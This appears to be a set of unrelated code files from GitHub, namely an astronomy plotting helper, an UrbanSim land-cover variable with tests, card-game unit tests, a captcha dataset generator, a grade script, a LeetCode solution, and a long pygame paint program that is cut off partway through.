def subhalo_grid_plot_from_samples(samples, levels=None):
plt.figure(
figsize=(15, 15)
)
# ...
if levels is None:
levels = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
# ...
for i in range(np.shape(samples)[0]):
for j in range(np.shape(samples)[0]):
sample_temp = samples[i][j]
if sample_temp is not None:
density2D = sample_temp.get2DDensity(
'galaxies_subhalo_mass_centre_1',
'galaxies_subhalo_mass_centre_0'
)
if density2D is not None:
plt.contour(
density2D.x,
density2D.y,
density2D.P,
levels=levels,
colors="black"
)
#print("OK")
for i in np.linspace(-2.0, 2.0, 5):
plt.axvline(i, linestyle="--", linewidth=2, color="r")
plt.axhline(i, linestyle="--", linewidth=2, color="r")
plt.plot([-1.0], [0.0], marker="*", markersize=20, color="b")
plt.xlabel("x (arcsec)", fontsize=20)
plt.ylabel("y (arcsec)", fontsize=20)
plt.xlim((-2.1, 2.1))
plt.ylim((-2.1, 2.1))
plt.show()
if __name__ == "__main__":
phase_directory = "/Users/ccbh87/Desktop/COSMA/cosma7/data/dp004/dc-amvr1/workspace/output/interferometer/lens_powerlaw_and_shear_and_subhalo__source_ellipticalcoresersic/model_1/total_flux_1.0_Jy/5.6/230GHz/t_tot__60s/t_int__10s/n_channels_128/0.5mm/width_128/pipeline__lens_fixed_with_subhalo__source_inversion/general/source__pix_voro_mag__reg_const__with_shear/phase_2__subhalo_search__source/phase_tag__rs_shape_125x125__rs_pix_0.04x0.04__sub_2__pos_0.20/"
xmin = -2.0
xmax = 2.0
ymin = -2.0
ymax = 2.0
number_of_steps = 4
subphase_directories = get_subphase_directories_for_gridsearch(
phase_directory=phase_directory,
xmin=xmin,
xmax=xmax,
ymin=ymin,
ymax=ymax,
number_of_steps=number_of_steps
)
samples = get_samples_from_subphase_directories(directories=subphase_directories)
subhalo_grid_plot_from_samples(samples=samples)
| Sketos/utils | autolens_utils/autolens_directory_utils.py | autolens_directory_utils.py | py | 5,540 | python | en | code | 0 | github-code | 36 |
28508588527 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from numpy import float32, arcsin, sqrt
from numpy import ma
from opus_core.variables.variable import Variable
from biocomplexity.land_cover.variable_functions import my_attribute_label
class pwa(Variable):
"""Percent water within footprint.
- need {"constants":{"FOOTPRINT":footprint,"OW":12}} in resources
when compute, where footprint=ones(shape=(5,5), dtype="int32")."""
land_cover_type_ow_within_footprint = 'land_cover_type_ow_within_footprint' # ow->open_water
footprint_size = 'footprint_size'
def dependencies(self):
return [my_attribute_label(self.land_cover_type_ow_within_footprint),
my_attribute_label(self.footprint_size)]
def compute(self, dataset_pool):
den = self.get_dataset().get_attribute(self.footprint_size).astype(float32)
pct = self.get_dataset().get_attribute(self.land_cover_type_ow_within_footprint)
return ma.filled(arcsin(sqrt(pct/den)), 0)
from numpy import array
from opus_core.tests import opus_unittest
from opus_core.datasets.dataset_pool import DatasetPool
from opus_core.storage_factory import StorageFactory
from biocomplexity.tests.expected_data_test import ExpectedDataTest
class Tests(ExpectedDataTest):
variable_name = "biocomplexity.land_cover.pwa"
def test_my_inputs(self):
storage = StorageFactory().get_storage('dict_storage')
storage.write_table(
table_name='land_covers',
table_data={
'relative_x': array([1,2,1,2]),
'relative_y': array([1,1,2,2]),
"land_cover_type_ow_within_footprint": array([3, 2, 1, 0]),
"footprint_size": array([5, 4, 5, 5])
}
)
dataset_pool = DatasetPool(package_order=['biocomplexity'],
storage=storage)
footprint = array([[0,1,0], [1,1,1], [0,1,0]])
dataset_pool._add_dataset(
'constant',
{
"FOOTPRINT": footprint,
}
)
gridcell = dataset_pool.get_dataset('land_cover')
gridcell.compute_variables(self.variable_name,
dataset_pool=dataset_pool)
values = gridcell.get_attribute(self.variable_name)
should_be = array([3, 2, 1, 0], dtype=float32) / array([5, 4, 5, 5], dtype=float32)
should_be = arcsin(sqrt(should_be))
self.assert_(ma.allclose( values, should_be, rtol=1e-7),
msg = "Error in " + self.variable_name)
def test_on_expected_data(self):
from numpy import ones
footprint = ones(shape=(5,5), dtype="int32")
self.do_test_on_expected_data(["lct","relative_x","relative_y"],
{"constants":{"FOOTPRINT":footprint,"OW":12}},
element_atol=0.07)
if __name__=='__main__':
opus_unittest.main() | psrc/urbansim | biocomplexity/land_cover/pwa.py | pwa.py | py | 3,171 | python | en | code | 4 | github-code | 36 |
11837397080 | '''test_board.py - unit tests for board.py'''
# pylint: disable=E0401, W0621
from src.py import board
from src.py.player import Player
from src.py.card import Card
def test_get_player_name(monkeypatch):
'''test get_player_name with mock inputs'''
# Given
inputs = iter(['Bryan', 'y'])
monkeypatch.setattr('builtins.input', lambda _: next(inputs))
# When
name = board.get_player_name()
# Then
assert name == 'Bryan'
def test_pick_player(monkeypatch):
'''test pick_player() with mock input'''
# Given
players = [Player('Hanna'), Player('Richard', bot=False), Player('Kate', bot=False)]
monkeypatch.setattr('builtins.input', lambda _: 'Hanna')
# When
human_picked_player = board.pick_player(players[2], players)
bot_picked_player = board.pick_player(players[0], players)
# Then
assert human_picked_player.name() == 'Hanna'
assert human_picked_player.bot()
assert bot_picked_player.name() in ['Richard', 'Kate']
assert not bot_picked_player.bot()
def test_pick_card_with_bot():
'''test pick_card with bot arg'''
# Given
bot = Player('TEST BOT', True)
bot.d_hand = [ Card('♠','A'), Card('♠','A'), Card('♠','A') ]
# When
picked_card = board.pick_card(bot)
# Then
assert picked_card.face() == 'A'
assert picked_card.suit() == '♠'
assert picked_card.space() == ' '
def test_pick_card_with_human(monkeypatch):
'''test pick_card with human player & mock inputs'''
# Given
human = Player('TEST HUMAN', False)
human.d_hand = [ Card('♡','Q'), Card('♡','K'), Card('♡','A') ]
monkeypatch.setattr('builtins.input', lambda _: 'Q') # Mock user input
# When
picked_card = board.pick_card(human)
# Then
assert picked_card.face() == 'Q'
assert picked_card.suit() == '♡'
assert picked_card.space() == ' '
| dariustb/GoFish | tests/unit_tests/test_board.py | test_board.py | py | 1,883 | python | en | code | 0 | github-code | 36 |
74978102183 | import os
import random
from captcha import image
import numpy as np
import PIL.Image as PILImage
import cv2
import shutil
def create_train_dataset(output_dir: str, width: float, height: float, captcha_count=4, count=2000):
if not os.path.exists(output_dir):
os.mkdir(output_dir)
number_sets = lambda offset: str(offset)
lowcase_char_sets = lambda offset: chr(97 + offset)
upcase_char_sets = lambda offset: chr(65 + offset)
avaliable_sets = []
for i in range(0, 10):
avaliable_sets.append(number_sets(i))
# for i in range(0, 26):
# avaliable_sets.append(lowcase_char_sets(i))
# for i in range(0, 26):
# avaliable_sets.append(upcase_char_sets(i))
def random_str(count):
str = ""
for i in range(0, count):
rand_index = random.randrange(0, len(avaliable_sets) - 1)
str = str + avaliable_sets[rand_index]
return str
image_captcha = image.ImageCaptcha(width=width, height=height)
for i in range(count):
captcha_str = random_str(captcha_count)
image_captcha.write(captcha_str, output_dir + "/" + captcha_str + ".png", "png")
print("Gen captcha: {0}".format(captcha_str))
def remove_dataset(dir):
if os.path.exists(dir):
shutil.rmtree(dir)
def read_dataset(dir):
images = []
labels = []
for subpath in os.listdir(dir):
if subpath.endswith(".png"):
image = np.array(PILImage.open(os.path.join(dir, subpath)))
label = subpath[:-4]
gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
images.append(gray_img / 255.0)
labels.append(label)
return images, labels
| SquarePants1991/LearnTensorFlow | 验证码识别/dataset_util.py | dataset_util.py | py | 1,701 | python | en | code | 0 | github-code | 36 |
23297961850 | #Criando a tupla
notas = {}
#Perguntando os dados aos usuários
i=1
while i <= 5:
aluno = input(str("Insira o nome do aluno: "))
nota = input("Insira a nota de {} no formato X.X: ".format(aluno))
notas[aluno] = nota
i= i + 1
#Dicionário com os alunos e as respectivas notas
print(notas)
#Resposta
maiornota = max(notas.values())
def search(term):
for k, v in notas.items():
if term in v:
return k
alunomaiornota = search(maiornota)
print("A maior nota foi a de {}, que tirou {} pontos." .format(alunomaiornota,maiornota))
| BrunoArivabene/NaviSummer2021 | Questao3.py | Questao3.py | py | 592 | python | pt | code | 0 | github-code | 36 |
28225180956 | from typing import List
import unittest
class Solution:
def carFleet(self, target: int, position: List[int], speed: List[int]) -> int:
records = [
(pos, spd) for pos, spd in zip(position, speed)
]
records.sort(key=lambda x: x[0])
for i in range(len(records)):
records[i] = (target - records[i][0])/records[i][1]
stack = []
for record in records:
while stack and record >= stack[-1]:
stack.pop()
stack.append(record)
return len(stack)
class TestCases(unittest.TestCase):
def setUp(self):
self.sol = Solution().carFleet
def test_solution_1(self):
target = 12
position = [10,8,0,5,3]
speed = [2,4,1,1,3]
ans = self.sol(target, position, speed)
expected = 3
self.assertEqual(ans, expected)
target = 100
position = [0,2,4]
speed = [4,2,1]
ans = self.sol(target, position, speed)
expected = 1
self.assertEqual(ans, expected)
target = 10
position = [3]
speed = [3]
ans = self.sol(target, position, speed)
expected = 1
self.assertEqual(ans, expected)
if __name__ == '__main__':
unittest.main() | HomayoonAlimohammadi/Training | Leetcode/853_CarFleet.py | 853_CarFleet.py | py | 1,349 | python | en | code | 2 | github-code | 36 |
75097166503 | #UPDATED PAINT/ORGANISED
#calvin and hobbes by Andy Liu
"""
FEATURES
buttons:
-red highlight on hover
-green highlight on click
tools:
-Pencil, only black and thin
-Line, drag and drop
-Oval, drag and drop, left click for filled,right click for unfilled
-Rectangle, see above
-Brush, variable color and size, smoothly connected
-Polygon, left click to add verticies, right click to close poly
-Spray can
-Dropper, click for the color
-Flood fill, fill an enclosed area with a color
-Hilighter, same as brush but translucent
-Eraser, erases to the choosed background
-Clear, Erase everything except choosed background
stamps:
-calvin
-moe
-hobbes
-wagon
-walking
-zombie
functions:
-undo
-redo
-(as png or jpg)
-load (png or jpg, loaded pic becomes choosed background)
music:
-play/pause music
-stop music (if you play again it restarts)
background:
-white
-rocks
-dinosaur
-tree
color choosing:
-wheel picker
-color display
text box:
-position relative to canvas
-color chosen
-button descriptors on hover
"""
"""
STATIC THINGS
only need to do once
"""
#SETUP
#=====================================================
#importing
from random import *
from math import *
from tkinter import *
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import asksaveasfilename
from pygame import *
#tkinter stuff
root = Tk()
root.withdraw()
#screen
screen = display.set_mode((1280,800))
#background
background = image.load("images/calvin-background.jpg")
screen.blit(background,(0,0))
#canvas
canvas = Rect(50,50,720,540)
draw.rect(screen,(255,255,255),canvas)
draw.rect(screen,(0,0,0),(47,47,726,546),3) #outside border not inside
#title
titlepng = image.load("images/title.png")
screen.blit(titlepng, (885,14))
#font
font.init()
calibrifont = font.SysFont("Calibri",17)
#======================================================
#MUSIC LOAD AND VOLUME
#========================================================
init()
mixer.music.load("music/slipfunc - amid the flowers..mp3")
mixer.music.play(-1)
mixer.music.set_volume(0.25)
#=========================================================
#Text Box rectangle
#=========================================================
textbox = (790,430,265,160)
draw.rect(screen,(255,255,255),textbox)
draw.rect(screen,0,textbox,3)
#THE COLOR WHEEL
#========================================================
#wheel
wheel = image.load("images/colorwheel.png")
wheel = transform.smoothscale(wheel,(170,170))
wheelrect = (885,240,170,170)
screen.blit(wheel,(885,240))
draw.rect(screen,(255,255,255),wheelrect,3)
#color display
coldisplay = (1075,288,75,75)
colchoosed = ((1075,288),(1075,363),(1150,288)) #a triangle on the top left corner
draw.rect(screen,(255,255,255),coldisplay) #later will draw colchoosed with color picked
#=========================================================
#DRAWING BUTTONS AND PUTTING THEM IN LISTS
#most buttons are 75x75 with 20 px between
#========================================================
#tool buttons pattern for button places
toolbuts = []
p = 50
for i in range(6):
draw.rect(screen,(255,255,255),(p,610,75,75))
draw.rect(screen,(255,255,255),(p,705,75,75))
toolbuts.append((p,610,75,75))
toolbuts.append((p,705,75,75))
p+=95
#stamp buttons
stampbuts = []
q = 695 #similar code going down
for j in range(3):
draw.rect(screen,(255,255,255),(q,610,75,75))
draw.rect(screen,(255,255,255),(q,705,75,75))
stampbuts.append((q,610,75,75))
stampbuts.append((q,705,75,75))
q+=95
#function buttons
funtsbuts = []
r = 50
for c in range(4):
draw.rect(screen,(255,255,255),(790,r,75,75))
funtsbuts.append((790,r,75,75))
r += 95 #pattern goes down instead of across
#music buttons
#special places and sizes (50x50)
musicbuts = []
playbut = (984,631,50,50)
stopbut = (984,726,50,50)
musicbuts.extend((playbut,stopbut))
for place in musicbuts:
draw.rect(screen,(255,255,255),place)
#background changing buttons
backgroundbuts = []
whitebut = (1075,430,75,75)
draw.rect(screen,(255,255,255),whitebut)
hopsbut = (1170,430,75,75)
dinobut = (1075,515,75,75)
treebut = (1170,515,75,75)
backgroundbuts.extend((whitebut,hopsbut,dinobut,treebut))
#==========================================================
#IMAGE LOADING AND PUT INTO LISTS
#==========================================================
#tool images (logos)
toolimages = []
pencilpng = image.load("images/pencil-icon.png")
linepng = image.load("images/line-icon.png")
ovalpng = image.load("images/oval-icon.png")
rectanglepng = image.load("images/rectangle-icon.png")
brushpng = image.load("images/brush-icon.png")
polypng = image.load("images/poly-icon.png")
spraypng = image.load("images/spraycan-icon.png")
droppng = image.load("images/dropper-icon.png")
fillpng = image.load("images/fill-icon.png")
hilitepng = image.load("images/hilite-icon.png")
erasepng = image.load("images/eraser-icon.png")
erallpng = image.load("images/erall-icon.png")
toolimages.extend((pencilpng,linepng,ovalpng,rectanglepng,brushpng,polypng,spraypng,droppng,fillpng,hilitepng,erasepng,erallpng))
#stamp images
stampimages = []
calvinpng = image.load("images/calvin-stamp.png")
moepng = image.load("images/moe-stamp.png")
hobbespng = image.load("images/hobbes-stamp.png")
wagonpng = image.load("images/wagon-stamp.png")
walkingpng = image.load("images/walking-stamp.png")
zombiespng = image.load("images/zombies-stamp.png")
stampimages.extend((calvinpng,moepng,hobbespng,wagonpng,walkingpng,zombiespng))
#display stamp logos
#already cropped into squares
displayimages = []
calvindisp = image.load("images/calvin-display.png")
moedisp = image.load("images/moe-display.png")
hobbesdisp = image.load("images/hobbes-display.png")
wagondisp = image.load("images/wagon-display.png")
walkingdisp = image.load("images/walking-display.png")
zombiesdisp = image.load("images/zombies-display.png")
displayimages.extend((calvindisp,moedisp,hobbesdisp,wagondisp,walkingdisp,zombiesdisp))
#function images
funtimages = []
undopng = image.load("images/undo-icon.png")
redopng = image.load("images/redo-icon.png")
savepng = image.load("images/save-icon.png")
loadpng = image.load("images/import-icon.png")
funtimages.extend((undopng,redopng,savepng,loadpng))
#music images
musicimages = []
playpng = image.load("images/play-icon.png")
stoppng = image.load("images/stop-icon.png")
musicimages.extend((playpng,stoppng))
#background imagees
#these images are already resized to 720x540 externally
backimages = []
hopspng = image.load("images/hops-canvas.png")
dinopng = image.load("images/dino-canvas.png")
treepng = image.load("images/tree-canvas.png")
backimages.extend(("filler",hopspng,dinopng,treepng)) #filler in the white background spot, makes indexes consistent
#MAKE SURE TO CHACK FOR FILLER LATER
#background display images
#cropped to squares already
backdispimages = []
hopsdisp = image.load("images/hops-display.png")
dinodisp = image.load("images/dino-display.png")
treedisp = image.load("images/tree-display.png")
backdispimages.extend((hopsdisp,dinodisp,treedisp))
#===========================================================
#RESIZE ALL IMAGES
#faster with lists
#===========================================================
#resize background display images to 75x75
for img in backdispimages:
backdispimages[backdispimages.index(img)] = transform.smoothscale(img,(75,75))
backdispimages.insert(0,"filler spot") #fill the zero spot with a filler, make indexes consistent between all background related list AFTER resizing images
#resize tool images to 75x75
for img in toolimages:
toolimages[toolimages.index(img)] = transform.smoothscale(img,(75,75))
#resize display images to 75x75
for img in displayimages:
displayimages[displayimages.index(img)] = transform.smoothscale(img,(75,75))
#resize function images to 75x75
for img in funtimages:
funtimages[funtimages.index(img)] = transform.smoothscale(img,(75,75))
#resize music images to 50x50
for img in musicimages:
musicimages[musicimages.index(img)] = transform.smoothscale(img,(50,50))
#=============================================================
#BLIT IMAGES INTO CORRECT SPOTS
#=========================================================
#blit tool images
p = 50
for i in range(6): #same code as defining rectangles but now blitting images in their places instead
screen.blit(toolimages[2*i],(p,610)) #2 rows of buttons :. this pattern fills every box
screen.blit(toolimages[2*i+1],(p,705))
p+=95
#blit display images
q = 695
for i in range(3): #same code again
screen.blit(displayimages[2*i],(q,610))
screen.blit(displayimages[2*i+1],(q,705))
q+=95
#blit function images
r = 50
for i in range(4):
screen.blit(funtimages[i],(790,r))
r += 95
#blit music images
screen.blit(musicimages[0],(984,631))
screen.blit(musicimages[1],(984,726))
#blit background display
for i in [1,2,3]: #not index of zero cuz thats the filler button
(x,y,useless1,useless2) = backgroundbuts[i]
screen.blit(backdispimages[i],(x,y))
#===========================================================
#COLLECTION OF LISTS
#list of buttons, bools, text and names are all related by order
#in the true/false list whatever place is true is whatever thing is chosen
#using lists for all of this so the code for choosing tools can span loops and not alot of if/else
#===========================================================
#oneselect (tools + stamps) only one can be selected at once
oneselectbuts = toolbuts + stampbuts
oneselectbools = [True] + [False] * 17 #default pencil
oneselect = ["pencil","line","oval","rectangle","brush","poly","spray","drop",
"fill","hilite","erase","erall","calvin","moe","hobbes","wagon","walking","zombies"]
#functions
funts = ["undo","redo","save","load"]
funtsbools = [False]*4
#music
music = ["play","stop"]
musicbools = [True] + [False] #playing music is default
#background
backgroundbools = [True] + [False]*3
#everything
everybuts = oneselectbuts + funtsbuts + musicbuts + backgroundbuts
#text for dialog boxes
#lists inside lists let me blit each item in the inner list on different "lines" using a loop
#last one is blank for when nothing needs to be printed
tooltext = [
["Pencil","Draw a thin, black line"],
["Line","Draw a straight line"],
["Oval","Left click for filled","Right click for unfilled"],
["Rectangle","Left click for filled","Right click for unfilled"],
["Brush","Draw with a brush effect"],
["Polygon","Left click to connect points","Right click to close polygon"],
["Spray Can","Draw with a spray can effect"],
["Dropper","Click to select the color"],
["Fill","Fill the entire canvas"],
["Hilighter","Draw a translucent color"],
["Eraser","Erase where you click"],
["Clear","Erase everything"],
["Calvin Stamp"],
["Moe Stamp"],
["Hobbes Stamp"],
["Calvin and Hobbes on wagon Stamp"],
["Calvin and Hobbes walking Stamp"],
["Zombie Calvin and Hobbes Stamp"],
["Undo","Undo your last action"],
["Redo","Redo your last action"],
["Save","Save the canvas as a PNG or JPG"],
["Load","Load a canvas (720x540)"],
["Play","Click to pause/play music"],
["Stop","Stop the music"],
["White Background"],
["Hopping on rocks Background"],
["Dinosaur Background"],
["Sleeping in a tree Background"],
[" "]
]
#===========================================================
"""
ACTIVE PARTS
"""
#DEFAULT OPTIONS
#=========================================================
#undo/redo lists
undolist = []
redolist = []
canvascop = screen.subsurface(canvas).copy()
whitebox = canvascop #for background
undolist.append(canvascop)
#color (black)
r,g,b,a = 0,0,0,0 #makes it easier to alter A value
color = r,g,b,a #makes it easier to type
#poly points
points = []
#fill definitions
fillps = set()
fillcol = False #no color
size = 4
#undo/redo perameters
uponcanvas = False
clickoncanvas = False
choosedbackground = whitebox #the preselscted background, this defines the variable only at the start
#=======================================================
#START THE WHILE LOOP
#=======================================================
running = True
while running:
#flags for different events
click = False
unclick = False
left = False
right = False
upscroll = False
downscroll = False
for e in event.get():
#event triggers
if e.type == MOUSEBUTTONDOWN:
click = True
if e.button == 1:
left = True
if e.button == 3:
right = True
if e.button == 4:
upscroll = True
if e.button == 5:
downscroll = True
if e.type == MOUSEBUTTONUP:
if e.button == 1 or e.button == 3: #no mouse wheel plz
unclick = True
if e.type == QUIT:
running = False
#========================================================
#TYPICAL MOUSE FUNCTIONS
#========================================================
mx,my = mouse.get_pos()
mb = mouse.get_pressed()
#=========================================================
#SIZE
#=======================================================
#size selecting:
if upscroll and size<18: #sets max size
size += 1
if downscroll and size>4:#sets min size
size -= 1
#========================================================
#CHOOSE COLOR
#========================================================
#color picking:
if Rect(wheelrect).collidepoint((mx,my)) and (left or right):
r,g,b,a = screen.get_at((mx,my)) #using both rgba and color so setting A value is easier
color = r,g,b,a
#display color
draw.polygon(screen,color,colchoosed)
draw.rect(screen,color,coldisplay,3)
#=========================================================
#BUTTON HOVERING
#======================================================
#red if hovering else black. also keep track of the button hovering index for text box later
hovering = -1
for place in everybuts:
if Rect(place).collidepoint(mx,my):
draw.rect(screen,(255,0,0),place,3)
ind = everybuts.index(place)
hovering = ind
else:
draw.rect(screen,(0,0,0),place,3)
#=======================================================
#CLICKING BUTTONS
#THE ONLY WAY FOR A BUTTON TO TURN TRUE IS WITH A CLICK!
#====================================================
#oneselect
for but in oneselectbuts:
if Rect(but).collidepoint(mx,my) and (left or right):
ind = oneselectbuts.index(but)
oneselectbools = [False]*18
oneselectbools[ind] = True
#function
for but in funtsbuts:
if Rect(but).collidepoint(mx,my) and (left or right):
ind = funtsbuts.index(but)
funtsbools = [False]*4
funtsbools[ind] = True
#combining blitting the background on canvas and turning the button true
#the true is only for green highlight reasons now
#background
for but in backgroundbuts:
if Rect(but).collidepoint(mx,my):
if left or right:
ind = backgroundbuts.index(but)
if ind == 0:
draw.rect(screen,(255,255,255),canvas)
choosedbackground = whitebox #what the background is at the present moment. used later for erasing and erall purposes
else:
screen.blit(backimages[ind],(50,50))
choosedbackground = backimages[ind] #what the background is rn for future reference
undolist = []
undolist.append(choosedbackground) #reset undolist because selecting a different background is like clearing the screen
redolist = []
backgroundbools = [False]*4
backgroundbools[ind] = True
#music true and false work differently (both can be false at the same time)
#if play is true and you click than play is false
#no need for loop because its only 2 bools long
#cases for play
if Rect(musicbuts[0]).collidepoint(mx,my) and (left or right): #musicbools[0] is the play button
if musicbools[0]: # if play is true and you click on it, it turns false but stopbut doesn't turn true
musicbools[0] = False #:. pause NOT stop
else:
musicbools[0] = True
musicbools[1] = False
#case for stop
if Rect(musicbuts[1]).collidepoint(mx,my):
if right or left:
musicbools = [False]*2
musicbools[1] = True #always turns play to false when you click on stop
#====================================================================
#WHAT DID YOU CLICK?
#=============================================================================
#every "true" button gets a green border
#drawing green comes after drawing red so its always green
everybools = oneselectbools + funtsbools + musicbools + backgroundbools #every true and false at its current state
for but in everybuts:
if everybools[everybuts.index(but)]:
draw.rect(screen,(0,255,0),but,3)
#=======================================================
#Text in the text box
#=======================================================
#Reset text box
draw.rect(screen,(255,255,255),textbox)
draw.rect(screen,0,textbox,3)
#mouse location on canvas
mouselocation = calibrifont.render("Mouse position at "+str((mx-50,my-50)),True,(0,0,0)) #canvas starts at 50,50 so subtr 50 to get canvas position
notoncanvas = calibrifont.render("Not on canvas",True,(0,0,0))
if Rect(canvas).collidepoint(mx,my): #in case not on canvas
screen.blit(mouselocation,(800,447))
else:
screen.blit(notoncanvas,(800,447))
#color selected
colormessage = calibrifont.render("Color = "+str((r,g,b)),True,(0,0,0)) # A val is useless
screen.blit(colormessage,(800,470))
#size selected
sizemessage = calibrifont.render("Size = "+str(size),True,((0,0,0)))
screen.blit(sizemessage,(800,493))
#tool selected
d = 516
for text in tooltext[hovering]: #lists inside lists, puts every text short on a new "line"
toolmessage = calibrifont.render(text,True,(0,0,0)) #if hovering == -1 it blits the last text which is nothing
screen.blit(toolmessage, (800,d))
d += 23 #17 ft and 23 space gives 5 pixels of in between
#ACTUALLY DOING MUSIC NOW
#========================================================
#play and pause with music (false = pause) (true = play)
#playbut is play and pause in one place
if not musicbools[0]:
mixer.music.pause()
else:
if not mixer.music.get_busy():
mixer.music.play(-1)
else:
mixer.music.unpause()
#stop and unstop with music
if musicbools[1]:
mixer.music.stop()
#=======================================================
#SAVE AND LOAD
#=================================================
#save funtbools[2] is the save button
if funtsbools[2]:
location = asksaveasfilename()
if location != "": #prevents saving to nothing
image.save(screen.subsurface(canvas),location)
funtsbools[2] = False #do not repeat save
#load (funtcools[3] is the load button
if funtsbools[3]:
location = askopenfilename(filetypes = [("Picture files", "*.png;*.jpg")])
if location != "": #prevents loading from nothing
screen.set_clip(canvas)
loaded = image.load(location)
loaded = transform.smoothscale(loaded,(720,540))
choosedbackground = loaded
screen.blit(loaded,(50,50))
funtsbools[3] = False #do not repeat load
#===============================================
#UNDO AND REDO IS HARD (not anymroe)
#=======================================================
#UNDO
#is it drawing?
if (mb[0] == 1 or mb[2] == 1) and Rect(canvas).collidepoint(mx,my):
clickoncanvas = True
#add to undolist after mousebuttonup
if clickoncanvas:
if unclick:
uponcanvas = True
clickoncanvas = False
if len(undolist) == 1: #first unclick of the undolist resets the redolist so u cant redo past a blank screen
redolist = []
else:
uponcanvas = False
else:
uponcanvas = False
#adding things to the undolist
if uponcanvas:
onthecanvas = screen.subsurface(canvas).copy()
undolist.append(onthecanvas)
#the actual undoing
#blit the second last and move the last into redolist, check for length so no crashes
if funtsbools[0]:
if len(undolist)>1:
screen.blit(undolist[-2],(50,50))
redolist.append(undolist[-1])
del undolist[-1]
funtsbools[0] = False
#REDO
#blit the last and move it to undolist again
if funtsbools[1]:
if len(redolist)>0:
screen.blit(redolist[-1],(50,50))
undolist.append(redolist[-1])
del redolist[-1]
funtsbools[1] = False
#DRAWING STUFF!
#everything after this point has to do with drawing
#======================================================
screen.set_clip(canvas)
for trueorfalse in oneselectbools:
if trueorfalse: #if true :. it was clicked
if mb[0] == 1: #filled things and normal tools here
#pencil
if oneselect[oneselectbools.index(trueorfalse)] == "pencil": #only one bool in list is true :. index(trueorfalse) always has the right target, this is a way to jump from related lists
draw.line(screen,(0,0,0),(omx,omy),(mx,my),2) #always black, always size of 2., drawing a line from omx,omy to mx,my makes sure theres never any holes in the line
#line
if oneselect[oneselectbools.index(trueorfalse)] == "line":
if left: #set starting point
startingx,startingy = mx,my
cop = screen.copy()
hyp = int(hypot(mx-startingx,my-startingy))
screen.blit(cop,(0,0)) #so the line can "move" wothout drawing on the canvas until you unclick
for i in range(hyp): #draws a circle at every 1 interval of the hypotenuse
draw.circle(screen,color,(startingx+int((mx-startingx)/hyp*i),startingy+int((my-startingy)/hyp*i)),size) #similar triangles math all in one line
#filled oval
if oneselect[oneselectbools.index(trueorfalse)] == "oval": #see above
if left:
startingx,startingy =mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
circrect = Rect(startingx,startingy,mx-startingx,my-startingy)
circrect.normalize()
draw.ellipse(screen,color,circrect)
#filled rectangle
if oneselect[oneselectbools.index(trueorfalse)] == "rectangle": #see above
if left:
startingx,startingy =mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
draw.rect(screen,color,(startingx,startingy,mx-startingx,my-startingy))
#brush
if oneselect[oneselectbools.index(trueorfalse)] == "brush":
hyp = int(hypot(mx-omx,my-omy))
for i in range(hyp):
draw.circle(screen,color,(omx+int((mx-omx)/hyp*i),omy+int((my-omy)/hyp*i)),size) #see above (similar triangles)
#polygon is special, so it's skipped for now
#spraycan, 20 at a time is a good speed, pick random points
if oneselect[oneselectbools.index(trueorfalse)] == "spray":
for i in range(20):
rand1 = randint(size*-1,size)
rand2 = randint(size*-1,size)
if hypot(rand1,rand2) <= size:
screen.set_at((mx+rand1,my+rand2),color)
#dropper, selects the color you click
if oneselect[oneselectbools.index(trueorfalse)] == "drop":
if Rect(canvas).collidepoint(mx,my):
r,g,b,a = screen.get_at((mx,my)) #have to change both rgba and color to be consistent
color = r,g,b,a
#hiliter (translucent brush)
if oneselect[oneselectbools.index(trueorfalse)] == "hilite":
#what the hilite looks like
circscreen = Surface((size*2,size*2),SRCALPHA)
draw.circle(circscreen,(r,g,b,5),(size,size),size)
#put it on
hyp = int(hypot(mx-omx,my-omy))
for i in range(hyp):
screen.blit(circscreen,((omx+int((mx-omx)/hyp*i))-size,(omy+int((my-omy)/hyp*i))-size)) #the -size centers the surface(circle) to mouse
#eraser
if oneselect[oneselectbools.index(trueorfalse)] == "erase":
#the variable erasing is what you need to blit on screen, different cases for erasing depending on background
#define erasing when it is a white background
if choosedbackground == whitebox: #white square with dimensions 2sizex2size
erasing = Surface((size*2,size*2))
erasing.fill(16777215)
else:
picturesurface = Surface((1280,800)) #makes the subsurface thats the choosed background (same relativer mx and my)
picturesurface.blit(choosedbackground,(50,50))
hyp = int(hypot(mx-omx,my-omy))
for i in range(hyp):
#define erasing when not whitebackground
if choosedbackground != whitebox:
try:#try and except statements because this code sometimes crashes when you move the mouse too fast but if you skip the crashing case everything around it "fills its place" and it looks fine either way
erasing = picturesurface.subsurface(int(omx+int((mx-omx)/hyp*i))-size,int(omy+int((my-omy)/hyp*i))-size,size*2,size*2) #added int() so everything works
except:
pass
try:
screen.blit(erasing,((omx+int((mx-omx)/hyp*i))-size,(omy+int((my-omy)/hyp*i))-size))
except:
pass
#clear canvas, points list (poly), undolist (except for first) and redolist)
if oneselect[oneselectbools.index(trueorfalse)] == "erall":
if choosedbackground == whitebox:
draw.rect(screen,16777215,canvas)
else:
screen.blit(choosedbackground,(50,50))
points = []
undolist = [undolist[0]]
redolist = []
if mb[2] == 1:#unfilled shapes by rightclicking
#unfilled ellipse
#checked for ellipse radius greater than width
if oneselect[oneselectbools.index(trueorfalse)] == "oval": #same code as filled
if right:
startingx,startingy =mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
circrect = Rect(startingx,startingy,mx-startingx,my-startingy)
circrect.normalize()
if circrect.h > 2*size and circrect.w > 2*size:
draw.arc(screen,color,circrect,0,360,size)
else:
draw.ellipse(screen,color,circrect)
#unfilled rectangle
if oneselect[oneselectbools.index(trueorfalse)] == "rectangle": #same code as filled rect
if right:
startingx,startingy = mx,my
cop = screen.copy()
screen.blit(cop,(0,0))
unfilled = Rect(startingx,startingy,mx-startingx,my-startingy)
evensize = size+size%2
draw.rect(screen,color,unfilled,evensize)
draw.rect(screen,color,(startingx-(evensize)//2+1,startingy-(evensize)//2+1,evensize,evensize)) #next 4 lines fill in the corners of the rectangle
draw.rect(screen,color,(startingx-(evensize)//2+1,my-(evensize)//2,evensize,evensize)) #the various +1's eliminate pygame inconsistencies
draw.rect(screen,color,(mx-(evensize)//2,startingy-(evensize)//2+1,evensize,evensize)) #(found by trial)
